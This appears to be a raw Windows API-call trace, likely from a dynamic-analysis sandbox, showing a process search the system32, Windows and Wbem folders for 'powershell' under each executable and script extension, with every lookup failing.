	[0327.035] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBS", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.035] SetErrorMode (uMode=0x1) returned 0x1
	[0327.035] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.035] SetErrorMode (uMode=0x1) returned 0x1
	[0327.035] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.VBE", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.036] SetErrorMode (uMode=0x1) returned 0x1
	[0327.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.036] SetErrorMode (uMode=0x1) returned 0x1
	[0327.036] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JS", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.036] SetErrorMode (uMode=0x1) returned 0x1
	[0327.036] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.036] SetErrorMode (uMode=0x1) returned 0x1
	[0327.037] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.JSE", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.037] SetErrorMode (uMode=0x1) returned 0x1
	[0327.037] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.037] SetErrorMode (uMode=0x1) returned 0x1
	[0327.037] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSF", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.038] SetErrorMode (uMode=0x1) returned 0x1
	[0327.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.038] SetErrorMode (uMode=0x1) returned 0x1
	[0327.038] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.WSH", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.038] SetErrorMode (uMode=0x1) returned 0x1
	[0327.038] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.039] SetErrorMode (uMode=0x1) returned 0x1
	[0327.039] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell.MSC", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.039] SetErrorMode (uMode=0x1) returned 0x1
	[0327.039] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0327.039] SetErrorMode (uMode=0x1) returned 0x1
	[0327.039] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\powershell", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.040] SetErrorMode (uMode=0x1) returned 0x1
	[0327.040] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.040] SetErrorMode (uMode=0x1) returned 0x1
	[0327.040] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.ps1", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.040] SetErrorMode (uMode=0x1) returned 0x1
	[0327.040] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.041] SetErrorMode (uMode=0x1) returned 0x1
	[0327.041] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psm1", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.041] SetErrorMode (uMode=0x1) returned 0x1
	[0327.041] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.041] SetErrorMode (uMode=0x1) returned 0x1
	[0327.738] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.psd1", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.739] SetErrorMode (uMode=0x1) returned 0x1
	[0327.739] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.739] SetErrorMode (uMode=0x1) returned 0x1
	[0327.739] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.COM", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.739] SetErrorMode (uMode=0x1) returned 0x1
	[0327.740] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.740] SetErrorMode (uMode=0x1) returned 0x1
	[0327.740] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.EXE", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.740] SetErrorMode (uMode=0x1) returned 0x1
	[0327.740] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.740] SetErrorMode (uMode=0x1) returned 0x1
	[0327.741] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.BAT", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.741] SetErrorMode (uMode=0x1) returned 0x1
	[0327.741] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.741] SetErrorMode (uMode=0x1) returned 0x1
	[0327.741] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.CMD", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.741] SetErrorMode (uMode=0x1) returned 0x1
	[0327.742] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.742] SetErrorMode (uMode=0x1) returned 0x1
	[0327.742] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBS", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.742] SetErrorMode (uMode=0x1) returned 0x1
	[0327.742] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.742] SetErrorMode (uMode=0x1) returned 0x1
	[0327.743] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.VBE", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.743] SetErrorMode (uMode=0x1) returned 0x1
	[0327.743] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.743] SetErrorMode (uMode=0x1) returned 0x1
	[0327.743] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JS", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.744] SetErrorMode (uMode=0x1) returned 0x1
	[0327.744] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.744] SetErrorMode (uMode=0x1) returned 0x1
	[0327.744] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.JSE", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.744] SetErrorMode (uMode=0x1) returned 0x1
	[0327.745] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.745] SetErrorMode (uMode=0x1) returned 0x1
	[0327.745] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSF", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.745] SetErrorMode (uMode=0x1) returned 0x1
	[0327.745] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.745] SetErrorMode (uMode=0x1) returned 0x1
	[0327.746] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.WSH", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.746] SetErrorMode (uMode=0x1) returned 0x1
	[0327.746] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.746] SetErrorMode (uMode=0x1) returned 0x1
	[0327.746] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell.MSC", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.746] SetErrorMode (uMode=0x1) returned 0x1
	[0327.747] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0327.747] SetErrorMode (uMode=0x1) returned 0x1
	[0327.747] FindFirstFileW (in: lpFileName="C:\\Windows\\powershell", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.747] SetErrorMode (uMode=0x1) returned 0x1
	[0327.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.747] SetErrorMode (uMode=0x1) returned 0x1
	[0327.748] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.ps1", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.748] SetErrorMode (uMode=0x1) returned 0x1
	[0327.748] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.748] SetErrorMode (uMode=0x1) returned 0x1
	[0327.748] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psm1", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.749] SetErrorMode (uMode=0x1) returned 0x1
	[0327.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.749] SetErrorMode (uMode=0x1) returned 0x1
	[0327.749] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.psd1", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.749] SetErrorMode (uMode=0x1) returned 0x1
	[0327.749] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.750] SetErrorMode (uMode=0x1) returned 0x1
	[0327.750] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.COM", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.750] SetErrorMode (uMode=0x1) returned 0x1
	[0327.750] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.750] SetErrorMode (uMode=0x1) returned 0x1
	[0327.750] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.EXE", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.751] SetErrorMode (uMode=0x1) returned 0x1
	[0327.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.751] SetErrorMode (uMode=0x1) returned 0x1
	[0327.751] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.BAT", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.751] SetErrorMode (uMode=0x1) returned 0x1
	[0327.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.752] SetErrorMode (uMode=0x1) returned 0x1
	[0327.752] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.CMD", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.752] SetErrorMode (uMode=0x1) returned 0x1
	[0327.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.752] SetErrorMode (uMode=0x1) returned 0x1
	[0327.752] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.VBS", lpFindFileData=0x1c87dd20 | out: lpFindFileData=0x1c87dd20*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0327.753] SetErrorMode (uMode=0x1) returned 0x1
	[0327.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c87db80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0327.753] SetErrorMode (uMode=0x1) returned 0x1
